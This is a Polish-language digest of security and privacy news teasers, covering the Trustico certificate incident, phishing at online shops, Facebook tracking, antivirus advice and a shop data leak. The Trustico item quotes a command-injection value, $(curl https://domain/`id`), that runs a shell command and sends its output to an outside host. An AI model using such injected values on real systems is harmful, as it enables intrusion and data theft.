Czego nie powinniśmy robić w sieci
Z reguły to użytkownik komputera sam naraża swoją prywatność i bezpieczeństwo. Często nie zdajemy sobie sprawy z tego, co może być niebezpieczne. W pierwszym rozdziale książki poznamy najczęściej popełniane błędy, przez które przestajemy być anonimowi.
Bezpieczeństwo i prywatność w sieci
W internecie jest dostępnych mnóstwo informacji na nasz temat, właściwie można stwierdzić, że jesteśmy śledzeni na każdym kroku. Wszystkie odwiedzane przez nas strony, wyszukiwane słowa, przesyłane wiadomości, hasła, loginy – te i znacznie więcej informacji można przechwycić w ruchu sieciowym. Wiele informacji na nasz temat trafia także na serwery naszego dostawcy internetu…
Więcej dowiesz się na: http://www.komputerswiat.pl
23 000 certyfikatów SSL do wyrzutki. Mieli serwis odpalony na roocie + banalne wstrzyknięcie
Chodzi o Trustico, który dostarczał certyfikaty SSL m.in. „pechowemu” Equifax. Jak wyglądał exploit dający roota? Banalnie – w miejscu gdzie sprawdzaliśmy domenę wystarczyło wpisać: $(curl https://domain/`id`)
Efekt? Porażający, bo poza wykonaniem kodu, widać że wykonuje się on jako root…
Więcej dowiesz się na: https://sekurak.pl
Instytucje rządowe stawiają na chmurę i cyberbezpieczeństwo
Gartner informuje, iż dyrektorzy ds. informatyki w organizacjach rządowych planują inwestycje w trzech obszarach: usługach chmurowych, cyberbezpieczeństwie i analizie wielkich zbiorów danych.
Badania przeprowadzone przez Gartnera wykazały, iż 18 proc. respondentów reprezentujących instytucje publiczne przyznało, iż cyfrowa transformacja jest dla nich kluczową strategią. Ankietowani określili też priorytety swojej działalności. Najczęściej wskazywali na zapewnienie bezpieczeństwa i minimalizację ryzyka utraty danych (13 proc.), a w dalszej kolejności zapewnienie zgodności i regulacji (12 proc.), wprowadzanie innowacji technologicznych (11 proc.)…
Więcej dowiesz się na: https://www.pcworld.pl
Samsung kończy z aktualizacjami zabezpieczeń dla starszych modeli telefonów
Zła wiadomość dla użytkowników telefonów Samsunga, zwłaszcza jeśli chodzi o starsze modele. Firma postanowiła, że przestanie prowadzić wsparcie techniczne i zabezpieczeniowe dla starych handsetów. Sprawa jest o tyle kłopotliwa, że „stary” w tym przypadku oznacza telefony wypuszczone np. w roku 2016.
Już jakiś czas temu po kilku atakach malware na Androida, wiele firm zaczęło wypuszczać regularne łatki zabezpieczeniowe na swoje telefony…
Więcej dowiesz się na: http://www.komputerswiat.pl
90 procent sklepów online naraża klientów na phishing
Phishing nadal pozostaje jednym z najczęstszych sposobów wykorzystywanych przez cyberprzestępców do kradzieży danych. W bieżącym roku najczęstszymi ofiarami tego typu ataków mogą być klienci sklepów internetowych.
Najnowsze dane opublikowane przez ekspertów zajmujących się analizą poczty elektronicznej pokazują, iż sklepy internetowe narażają swoich klientów na duże ryzyko związane z utratą danych, a w dalszej konsekwencji środków finansowych…
Więcej dowiesz się na: https://www.pcworld.pl
Facebook śledzi nawet tych, którzy nie mają u nich konta — i nie widzi w tym problemu. Ale sąd już tak
Amerykańscy giganci w Europie nie mają łatwo. Tutejsze prawa często potrafią im pokrzyżować plany, albo co najmniej nieco utrudnić życie. Ostatnio głośno było o tym, że Facebook w aplikacji WhatsApp będzie udostępniać wszystkie dane które zgromadził na temat użytkownika, a teraz firma ma kolejny problem z belgijskim wymiarem sprawiedliwości. Ten ponownie orzekł, że gigant łamie prawo do prywatności swoimi wtyczkami, za pośrednictwem których śledzi użytkowników. Nawet tych, którzy nie mają konta w ich serwisie.
Walka o gusta i reklamy trwa w najlepsze
O tym że wszelkiej maści wtyczki śledzą poczynania użytkowników, by mieć na ich temat możliwie jak najwięcej informacji, a później jak najlepiej dostosowywać bannery do tego, co potencjalnie zainteresuje poszczególnych użytkowników…
Więcej dowiesz się na: http://antyweb.pl
Czy Mac OS potrzebuje antywirusa? Odpowiadamy i doradzamy
Czy komputery Apple potrzebują oprogramowania antywirusowego? Czy w ogóle istnieją wirusy stworzone pod Mac OS? Badamy zagrożenia oraz oprogramowanie zabezpieczające.
- Jeśli nie masz na Macu cennych danych i używasz go do zastosowań „codziennych”, to nie potrzebujesz antywirusa
- Jeśli używasz Maca do pracy lub masz na nim ważne dane, kup Bitdefender Antivirus for Mac 2018 – nie wypijesz trzech kaw na mieście, a przez rok będziesz żyć bez wirusowego stresu 😉
Pytanie, czy Mac potrzebuje antywirusa, nie jest niczym nowym i pozostaje kwestią sporną do dzisiaj. Maszyny stworzone przez Apple są z reguły bezpieczniejsze od PC działających na systemie Windows, ale nawet one nie są w pełni bezpieczne…
Więcej dowiesz się na: https://www.pcworld.pl
Jak Kamil dane pół miliona zamówień klientów sklepów internetowych znalazł
Zapewne części z Was zdarza się w trakcie zakupów czy odwiedzania innych witryn czasem podmienić numerek na końcu linka, by sprawdzić, co się stanie. Kamil podmienił i odkrył puszkę Pandory. Ale po kolei.
Odezwał się do nas Kamil Zieliński. Odezwał się, bo znalazł i opisał całkiem ciekawy przypadek, jak błąd w popularnym mechanizmie sklepowym i brak aktualizacji oprogramowania mogą doprowadzić do pokaźnego wycieku danych osobowych – i potencjalnie sporych problemów niektórych internautów. Lista klientów sexshopu może okazać się łakomym kąskiem dla szantażystów…
Ja tu tylko zmieniłem numerek
Kamil oglądał towary w sklepie tworczywo.pl. Najpierw jego uwagę zwróciła ciekawa subdomena strony, zawierająca słowo „test”. Musimy się zgodzić, brzmi jak zaproszenie do poszukiwań. Kamil użył wyrafinowanej techniki zwanej „Google hacking” i trafił na następujący link…
Więcej dowiesz się na: https://zaufanatrzeciastrona.pl
Jaki antywirus na Androida jest najlepszy?
Niezależne laboratorium AV-Test sprawdziło skuteczność i szybkość działania 27 programów antywirusowych na Androida. Oto wyniki testu antywirusów dla Androida wraz z rekomendacjami, który program warto kupić dla siebie.
Smartfony korzystające z systemu Android są bardzo często celem ataku cyberprzestępców – głównie dlatego, że łatwo namówić nieświadomego użytkownika smartfona do wysłania SMSa „premium”, pozostawienia danych karty kredytowej lub przypadkowego zobowiązania się do zainstalowania złośliwej aplikacji…
Więcej dowiesz się na: https://www.pcworld.pl